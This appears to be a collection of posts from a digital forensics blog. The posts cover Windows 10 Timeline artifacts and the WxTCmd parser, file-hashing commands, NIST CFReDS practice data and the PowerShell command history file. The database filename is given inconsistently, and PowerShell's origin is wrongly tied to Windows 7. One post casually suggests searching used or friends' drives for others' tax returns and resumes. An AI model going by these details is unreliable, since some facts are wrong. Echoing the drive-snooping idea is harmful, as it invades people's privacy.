Windows 10 Timeline Feature

There is a feature in updated versions of Windows 10 called "Timeline".
What might you think a feature with this name would do?

Could you say a similar to a browser history, but a history for the entire computer user activity?
MS might of dropped this one in the laps of forensicators.

Apart from websites that you visited, the Timeline shows the documents you worked with, the games you played, the images you viewed or created and recently executed applications.

Access the Timeline feature by the timeline icon on the bottom toolbar left side of windows startup button.

"WINDOWS KEY + Tab" will also take you there

Additional details about Timeline

Here's some additional information you need to know as you get started with Timeline on Windows 10:

• Timeline works only on devices running the Windows 10 April 2018 Update and later.
• Timeline is a feature that works on every version of Windows 10 that is connected using a Microsoft account.
• Office applications will appear in your timeline, but after saving the document or if auto save is enabled.
• You can't control which applications appear in your timeline.
• You can't check your timeline on the web, but you can view your activities in the privacy dashboard of your Microsoft account.
• You can't change the number of days that Timeline tracks on your devices. It's either 4 days or 30 days if the sync option is enabled.
• Timeline is supported on a multi-monitor setup, but your timeline will only appear in the display you invoked it.

The feature can be enabled and configured in "Settings --> Privacy --> Activity History"

***FOR FORENSIC PURPOSES


This is almost like a "organization" "productivity" feature, that can also double as a built-in forensics tool for us.

TIMELINE FEATURE DATA BASE FILE:
Located at :

C:\Users\<Username>\AppData\Local\ConnectedDevicesPlatform\L.<Username>\Activites.db

This file, "Activities.db" may be worth the while to parse and capture as a forensic artifact.

Can be viewed in FTK 

OR

Use the DFIR rockstar tool author, Eric Zimmerman's WxTCmd tool.

WxTCmd

0.3.1.0

Windows 10 Timeline database parser

https://cyberforensicator.com/2018/05/08/wxtcmd-windows-10-timeline-parser/
https://binaryforay.blogspot.com/2018/05/introducing-wxtcmd.html
https://ericzimmerman.github.io/#!index.md

1. Run the WxTCmd.exe tool against the ActivitiesCache.db file

.\WxTCmd.exe -f C:\Users\Win10\AppData\Local\ConnectedDevicesPlatform\L.Win10\ActivitiesCache.db --csv C:\Users\Win10\Desktop\

2.  Take the outputted csv or tsv(tab separated file) and open with Timeline Explorer(another of Zimmerman's finest)

Open in outputted .tsv file in Timeline Explorer

File-->Open-->path to .tsv

Timeline explorer will parse the Last Modified time, executable ran, display, and content info.

Also possible source for recent MS Edge browser activity

In Conclusion:

Windows 10 Timeline feature is a good feature for us forensicators to know.  The locations and presence of the Activities.db file can be potentially worth our while for recently used activities with timestamps.  And Edge browser recent history forensics with the timeline feature.
Big thanks to Eric Zimmerman for the never ending inspiration and awesome tools he provides the community.


--Bryan



RESOURCE

Microsoft. “{Get Help with Timeline}.” Support.microsoft.com, support.microsoft.com/en-us/help/4230676/windows-10-get-help-with-timeline.

Ways to Hash a File

So, you have begun your incident response and for documentation purposes you need to 

document the hashes of files.  Or you have imaged some media, perhaps memory. And you 

want the hashes of the image files.

In this post, I will outline a few ways to do so with some tools native to windows and some 

non-native tools.

___________________________________________________________________________

1. PowerShell (Get-FileHash)

Get-FileHash

Get-FileHash [-Path] <string[]> [-Algorithm {SHA1 | SHA256 | SHA384 | SHA512 

|MACTripleDES | MD5 | RIPEMD160}]

*Note

-(-al) can be abbreviated for Algorithm
- semicolon (;) to conjoin commands

Example:

The above command is hashing "hash_this.txt" with a MD5 and SHA1 algorithm.

___________________________________________________________________________ 

      2.   Certutil(-hashfile)

The above command is hashing "hash_this.txt" in an MD5 format

Example:

Certutil -hashfile <FILENAME><HASH ALGORITHM>

___________________________________________________________________________

3. MD5deep and SHA1deep

In your Incident Response kit, it would be a potentially good idea to have a subset of tools for

hashing.  MD5 deep, hashdeep, and SHA1deep are some possible options for you to do so.

Link to Download of MD5 deep:

https://github.com/jessek/hashdeep/releases

Example: md5deep64.exe <FILENAME>

*Note

There is also SHA1 deep, SHA256 deep, and a few other algorithm hashing exes from

the download link that works the same way as MD5 deep.

 ___________________________________________________________________________

4.  Hashing with MacOS and Linux

For MacOS:

Opening a terminal and using the command md5, shasum, or shasum -a 256 with the path to

the file will return a file hash.

Example:

md5 <FILEPATH>

md5 -r <FILEPATH>

openssl md5 <FILEPATH >

For Linux:

Opening a terminal and using the command md5sum, sha1sum, or sha256sum with the path to

the file will return a file hash.

Example

md5sum <FILEPATH>

sha1sum<FILEPATH>

sha256sum<FILEPATH>

___________________________________________________________________________

In conclusion, these are only a few ways to hash a file.  There are several more.  

There are also some 3rd party options, “HashTab” which adds a tab in the File’s Properties 

that details the hash.  

As well as “Hash Generator” and NitSoft’s “HashMyFiles” tool.  

And most forensics tools will include a hashing feature ability.  

But for an on the fly way, do remember that there are some command line methods to use at 

your helm. 

--Bryan

NIST CFReDS Project

National Institute of Standards and Technology(NIST) developed the Computer Forensic Reference Data Sets (CFReDS) for testing tools and training.

https://www.cfreds.nist.gov/

The site is made up of data sets and Forensics Images for simulation and testing forensic tools.
Included are questions and cases based on themed scenarios.
Be forewarned some of the data sets are a little dated; i.e., timestamps for 2004.

There is one case in particular that I like, the data leakage case, found at:
https://www.cfreds.nist.gov/data_leakage_case/data-leakage-case.html

This case has a reasonably creative narrative of a scenario related to the leaking of sensitive information.  The images were taken from a Windows 7 machine, so more recent than 2004.  And there are three different removable media types with different file systems to practice with.

This particular NIST project laid out some nice practice points for forensics too. Of which hits some of the main themes of the field.
Included are:

Practice Point	Description
Understanding Types of Data Leakage	- Storage devices       > HDD (Hard DiskDrive), SSD (Solid State Drive)       > USB flash drive, Flash memory cards       > CD/DVD (with Optical Disk Drive) - Network Transmission       > File sharing, Remote Desktop Connection       > E-mail, SNS (Social Network Service)       > Cloud services, Messenger
Windows Forensics	- Windows event logs - Opened files and directories - Application (executable) usage history - CD/DVD burning records - External devices attached to PC - Network drive connection traces - System Caches - Windows Search databases - Volume Shadow Copy
File System Forensics	- FAT, NTFS, UDF - Metadata (NTFS MFT, FAT Directory entry) - Timestamps - Transaction logs (NTFS)
Web Browser Forensics	- History, Cache, Cookie - Internet usage history (URLs, Search Keywords…)
E-mail Forensics	- MS Outlook file examination - E-mails and attachments
Database Forensics	- MS Extensible Storage Engine (ESE) Database - SQLite Database
Deleted Data Recovery	- Metadata based recovery - Signature & Content based recovery (aka Carving) - Recycle Bin of Windows - Unused area examination
User Behavior Analysis	- Constructing a forensic timeline of events - Visualizing the timeline

There has been recent developments of new trending themes in the field, but I do say for those starting off and wanting to test out forensic examination tools. This could provide to be a valuable resource. 

Other options include imaging your own media or your friends, which can be fun to test.
Another option would be to go to garage sale or ebay to buy old storage drives and see you what you could find.  Resumes, tax returns, movies...etc.  Piece your own scenario

But for a free options the CFReDS project is not a bad place to start.
I plan to cover an open source option, Autopsy, to test out the exercise from this site and showing here in the future.


Reference:

NIST. “The CFReDS Project.” The CFReDS Project, www.cfreds.nist.gov/

NIST "Data Leakage Case." "https://www.cfreds.nist.gov/data_leakage_case/data-leakage-case.html"

 

See Recent Typed Powershell Commands

The Powershell ConsoleHost_history file

Windows Powershell has become a beast of a command prompt tool that has become more and more useful for configuration, automation, forensics, penetration testing, etc.

It was first introduced on November 14, 2006 with the wonderful Windows 7 OS version.

There are some very nice commands that can be ran with powershell that will return some potentially valuable forensic information.
Such as:

PS C:\> Get-Process   --returns System Processes

PS C:\> Get-NetTCPConnection –State Established    --returns Network information

PS C:\> Get-ADUser     --returns information about a User

I will cover Powershell and useful commands more in depth in future posts.

For this post I want to point out a potentially valuable text file located at:

 "%APPDATA%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt"

View this text file to see a history of Powershell commands executed from the console.

Above is the contents of the ConsoleHost_history.txt file

This text file mentioned above, along with Powershell logs, can be used as a way to give insight into what powershell commands were ran on a box.  And potentially by which user with what commands where ran or attempted to be ran from the console.

--Bryan

First blog post

Greetings!

This is my first blog post.  I suppose an introduction is in order. 

My name is Bryan Ambrose.  I am a Digital Forensics(DF) and Cyber Security enthusiast. 

Former Network Defense and Incident Response analyst. And now a current instructor.

I claim NOT to know everything. Nor am I a self-described expert of the vast components that make up this wonder field of Digital Forensics.  

But I sure do embrace a passion for discovery and learning in this fun DF field.

I have over 10 years IT experience and 5 years in Digital forensics.  Former active duty Information Systems Technician and current Reservist.  

I have worked in digital media analysis and examiner positions roles for both DoD and DHS.  

I have completed a Master's degree in Digital Forensics and Cyber Investigations.

Currently hold OSCP, C|EH, CompTIA Security+, and DoD certified Media Collector and Forensics Examiner.

I am also certified with EnCase, Splunk, and various other tools

Enough of me, let's get to the fun stuff.

This blog is intended to document and journal findings of interesting tidbits that I have collected along the way.  

Not necessarily saying that what I post on here will be new but rather things I thought were neat and relative to the Digital Forensics and Incident Response(DFIR) field.  

I will be showcasing tools and methods/procedures that I have used to find data in the investigations I have seen.  And methods that could potentially be valuable for future cases.

Big theme of DF, and if you are an honest adult, is integrity.  That being so, I will try to give credit where it is due. And do my best to properly cite and document my sources. 

The site is called DataDigitally and the goal is to be a contributing DFIR member.  And this blog is a way for me to give back to the community that has given so much to me and never ceases to impress me.  

Keep on forensicating.  

--Bryan Ambrose

Bryan.w.ambrose@gmail.com

Me with a cup of joe

Current at home office setup (2019).